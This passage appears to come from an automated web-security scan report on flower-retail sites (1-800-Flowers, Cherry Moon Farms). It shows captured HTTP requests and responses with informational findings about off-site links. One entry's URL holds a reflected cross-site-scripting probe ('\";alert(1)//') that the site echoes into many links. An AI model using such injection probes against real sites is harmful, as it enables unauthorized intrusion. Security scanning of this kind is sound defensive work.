...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://affiliateprogram.1800flowers.com" target="_self" rank="">Affiliate Program</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/collection.do?dataset=11088" target="_self" rank="">
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/collection.do?dataset=11117" target="_self" rank="">
...[SNIP]...
</a> - Send us <a class="copylink" href="http://vovici.com/wsb.dll/s/2b42g408c4" rel="nofollow" target="_blank">Feedback on this Site</a>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
<!-- pageid END -->


   <script language="javascript1.1" src="http://media2.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...
16.24. http://ww30.1800flowers.com/collection.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /collection.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /collection.do?dataset=10305 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000oqktH2yyDUkrp5oGcWwUdty:-1; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.1.10.1304902847; cmTPSet=Y; CMAVID=70091303843240316067555; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902848067&t2=-1&t3=1304902867488&lti=1304902867488&ln=tab3p1_header&hr=/collection.do%3Fdataset%3D10305&fti=&fn=searchform%3A0%3Bfindgiftform%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=w-Welcome%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:04:11 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000qD3wSlEaCI6fvlpmlKhLnKM:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 73822


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta
...[SNIP]...
</a><a class="six" href="http://www.cheryls.com/webapp/wcs/stores/servlet/ProductDisplay?storeId=10202&amp;catalogId=10102&amp;partNumber=SJD76001&amp;r=2010072905&amp;cm_mmc=PR%20/%20Other%20/%20Misc-_-CCO-_-cookie-club-_-cookie-club" target="_blank" rank="6">Cookie Club</a>
...[SNIP]...
<div style="float:right;margin:2px 25px 0 0;" class="social-icons">    <a href="http://www.facebook.com/1800flowers" target="_blank"><img src="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/social-icon-facebook-01.gif" border="0" style="margin:0;"></a><a href="http://www.twitter.com/1800flowers" target="_blank" style="padding-left:10px;"><img src="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/social-icon-twitter.gif" border="0" style="margin:0;">
...[SNIP]...
<img src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://advice.liveperson.com/landing?v=1-800-flowers" target="_self" rank="">Floral Advice</a>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...
<!-- End LP Custom Variables-->


<img src="http://xcdn.xgraph.net/17572/ai/xg.gif?pid=17572&sid=12001&type=ai&pcid=collection" width="1" height="1" />

   
</body>
...[SNIP]...
16.25. http://ww30.1800flowers.com/product.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /product.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /product.do?baseCode=91637&dataset=10305&cm_cid=d10305 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000uX3-gHyeEcHw9aTrUn6TXJ9:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.3.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|3|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902894375&t2=1304902899114&t3=1304902906957&t4=1304902893038&lti=1304902906957&ln=&hr=/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&fti=&fn=searchform%3A0%3BguidedCollectionForm%3A1%3BsortForm%3A2%3BUNDEFINED%3A3%3B&ac=&fd=&uer=&fu=&pi=d10305-Collection%20Page%20-%20Spring&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:07:59 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 88969


                                                <html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="http://www.face
...[SNIP]...
</a><a class="six" href="http://www.cheryls.com/webapp/wcs/stores/servlet/ProductDisplay?storeId=10202&amp;catalogId=10102&amp;partNumber=SJD76001&amp;r=2010072905&amp;cm_mmc=PR%20/%20Other%20/%20Misc-_-CCO-_-cookie-club-_-cookie-club" target="_blank" rank="6">Cookie Club</a>
...[SNIP]...
<div style="float:right;margin:2px 25px 0 0;" class="social-icons">    <a href="http://www.facebook.com/1800flowers" target="_blank"><img src="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/social-icon-facebook-01.gif" border="0" style="margin:0;"></a><a href="http://www.twitter.com/1800flowers" target="_blank" style="padding-left:10px;"><img src="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/social-icon-twitter.gif" border="0" style="margin:0;">
...[SNIP]...
<img src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://advice.liveperson.com/landing?v=1-800-flowers" target="_self" rank="">Floral Advice</a>
...[SNIP]...
</script>


                                       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
<!-- Mercent Tag Start -->

<script src="https://cdn.mercent.com/js/tracker.js"
   type="text/javascript"></script>
...[SNIP]...
<noscript><img
   src="https://link.mercent.com/image.ashx?merchantID=OneEHFlowers"
   style="display: none"></noscript>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...
<!-- End LP Custom Variables-->


<iframe frameborder="0" width="0" height="0" src="http://adsfac.us/pct_mx.asp?L=305608&source=if"></iframe>
<img src="http://xcdn.xgraph.net/17572/ai/xg.gif?pid=17572&sid=12001&type=ai&pcid=product" width="1" height="1" />


</body>
...[SNIP]...
16.26. http://www.cherrymoonfarms.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cherrymoonfarms.com
Path:   /default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.cherrymoonfarms.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=p4m5s4gmscsdxjspfxzi5djy; domain=cherrymoonfarms.com; path=/
Set-Cookie: ASP.NET_SessionId=p4m5s4gmscsdxjspfxzi5djy; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_CMF=TestAssignmentValues=nta-2,xca-1,nte-1,cpz-1,csc-4,ntb-1,ntc-1,xcb-1,xcc-1,cfq-1,ntd-2; domain=.cherrymoonfarms.com; expires=Sat, 09-Jun-2012 12:22:05 GMT; path=/
Set-Cookie: ENDOFDAY_CMF=TestAssignmentValues=,chh-1,cks-1,mpsmediapersonalitysplit-1,ckt-2; domain=.cherrymoonfarms.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_CMF=TestConfigDateTimeUpdated=5/9/2011 5:22:05 AM; domain=.cherrymoonfarms.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=57; domain=.cherrymoonfarms.com; expires=Thu, 12-May-2011 12:22:05 GMT; path=/
Set-Cookie: CMF_BrowserId=648da04f-a5ff-42b4-9370-fae55b915cad; domain=.cherrymoonfarms.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: CMF_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.cherrymoonfarms.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:04 GMT
Content-Length: 107521


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/cmf_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/cmf_topnavstyles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/homecategorylandingcmf.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/cmf_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/cmf_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/cmf_redesign07.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<link rel="canonical" href="http://www.cherrymoonfarms.com/" /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
<div id="mainContainer" style="margin-bottom:5px;">
           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/CherryMoonFarms/images/favicon.ico"/>
<!-- Google Code for Cherry Moon Farms Remarketing General Conversion Page -->
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script><noscript><div style="display:inline;"><img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1071705545/?label=ySy3CLPwrwEQyduD_wM&amp;guid=ON&amp;script=0"/></div>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li id="proFlowerLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:100px;"><img height=31px width=100px height="31px" width="100px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:95px;"><img height=31px width=95px height="31px" width="95px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:110px;"><img height=31px width=110px height="31px" width="110px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:125px;"><img height=31px width=125px height="31px" width="125px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:110px;"><img height=31px width=110px height="31px" width="110px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<a id="_ctl12__homeLink" rel="nofollow" border="0" title="Go to Cherry Moon Farms Homepage" href="http://www.cherrymoonfarms.com/SiteMap.aspx?Ref=HomeNoRef" style="height:50px;width:366px;"><img height="50px" width="366px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Cherry Moon Farms Homepage" border="0" /></a>
...[SNIP]...
<li>
<a class="HeaderLink" href="https://accounts.proflowers.com/CustomerLogin.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;cobrand=cmf&amp;Ref=HomeNoRef">TRACK YOUR ORDER</a>
...[SNIP]...
<li >
<a class="HeaderLink" href="https://accounts.proflowers.com/CustomerLogin.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;cobrand=cmf&amp;Ref=HomeNoRef" style="border-right:none;">YOUR ACCOUNT</a>
...[SNIP]...
<a id="_ctl12__ctl29_lkCart" class="SecondaryColor" href="http://products.cherrymoonfarms.com/ShoppingCart.aspx?Ref=HomeNoRef"><img style="border: 0 none;" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_Cart.gif" alt="Shopping Cart" />&nbsp;view cart&nbsp;&nbsp;0</a>
...[SNIP]...
<a rel="nofollow" border="0" class="RadioIcon" href="http://www.cherrymoonfarms.com/radio/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef&amp;how=home"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMFHeaderRadioLink.gif" alt="" border="0" /></a>
...[SNIP]...
<center>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a>
<a class="Lckdwn1_Nav_CMF" href="http://www.floristexpress.net/?pfc=1&amp;refcode=CNF">Mother's Day</a>
...[SNIP]...
<li><a href="http://www.floristexpress.net/?pfc=1&amp;refcode=VNF">Mother's Day Flowers</a>
...[SNIP]...
<li style="border-bottom:none;"><a href="http://www.floristexpress.net/?pfc=1&amp;refcode=VNG">Mother's Day Gift Baskets</a>
...[SNIP]...
<li><a class="Lckdwn1_Nav_CMF" href="http://www.floristexpress.net/?pfc=1&amp;refcode=CNF">Mother's Day - 5/8</a>
...[SNIP]...
<li><a href="http://www.fruitbaskettoday.com?refcode=FNV">Same Day Delivery</a>
...[SNIP]...
<div class="SearchHolder">
    <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a id="_ctl12__ctl12_submit" type="image" prvdid="productsearchlink" href="http://www.cherrymoonfarms.com/ProductSearch.aspx?Ref=HomeNoRef" style="height:17px;width:48px;"><img height="17px" width="48px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_Go.gif" alt="" border="0" /></a>
...[SNIP]...
<a href="javascript:O_LC();"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/berries/siteimages/SiteFeedback_sm.gif" border="0" width="9" height="9" style="_vertical-align:middle;" title="site feedback" /></a>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a title="Shop Mother&#39;s Day Gifts" border="0" href="/mothers-day-gifts-cm1?tile=hmpg_hero&amp;Ref=HomeNoRef" style="height:283px;width:593px;"><img height="283px" width="593px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_Hero_593X283_042211.jpg" alt="Shop Mother&#39;s Day Gifts" border="0" /></a>
...[SNIP]...
<a title="Shop Mother&#39;s Day Flowers" border="0" href="/mothers-day-gifts-cm1?tile=hmpg_hero&amp;Ref=HomeNoRef" style="height:283px;width:593px;"><img height="283px" width="593px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_Hero_593X283_042911.jpg" alt="Shop Mother&#39;s Day Flowers" border="0" /></a>
...[SNIP]...
<a title="Shop Mother&#39;s Day Flowers" border="0" href="/sunday-delivery-svd?tile=hmpg_hero&amp;Ref=HomeNoRef" style="height:283px;width:593px;"><img height="283px" width="593px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_Hero_593X283_MDay11_SunMon.jpg" alt="Shop Mother&#39;s Day Flowers" border="0" /></a>
...[SNIP]...
<div class="Lckdwn1_HeroImg_CMF"> <a title="" border="0" href="http://www.floristexpress.net/?pfc=1&amp;refcode=CHH?tile=hmpg_hero" style="height:283px;width:593px;"><img height="283px" width="593px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_Hero_593X283_MDay11_FloristExpress.jpg" alt="" border="0" /></a>
...[SNIP]...
<a title="Shop Mother&#39;s Day Gifts" border="0" href="/mothers-day-gifts-cm1?tile=hmpg_hero&amp;Ref=HomeNoRef" style="height:283px;width:593px;"><img height="283px" width="593px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_Hero_593X283_MDay11_SoldOut-Belated.jpg" alt="Shop Mother&#39;s Day Gifts" border="0" /></a>
...[SNIP]...
<a title="Shop Cookies, Cakes &amp; Brownies for Mom" border="0" href="/mothers-day-sweets-cv6?tile=hmpg_skyscraper&amp;Ref=HomeNoRef" style="height:283px;width:189px;"><img height="283px" width="189px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_Sky_189X283_042211.jpg" alt="Shop Cookies, Cakes &amp; Brownies for Mom" border="0" /></a>
...[SNIP]...
<div class="Lckdwn1_Pod_CMF"> <a title="" border="0" href="http://www.floristexpress.net/?pfc=1&amp;refcode=CHS?tile=hmpg_hero" style="height:283px;width:189px;"><img height="283px" width="189px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_Sky_189X283_MDay11_FloristExpress.jpg" alt="" border="0" /></a>
...[SNIP]...
<a title="Shop Get Well Gifts" border="0" href="/get-well-gifts-cgw?tile=hmpg_skyscraper&amp;Ref=HomeNoRef" style="height:283px;width:189px;"><img height="283px" width="189px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_Sky_189X283_MDay11_SoldOut-Belated.jpg" alt="Shop Get Well Gifts" border="0" /></a>
...[SNIP]...
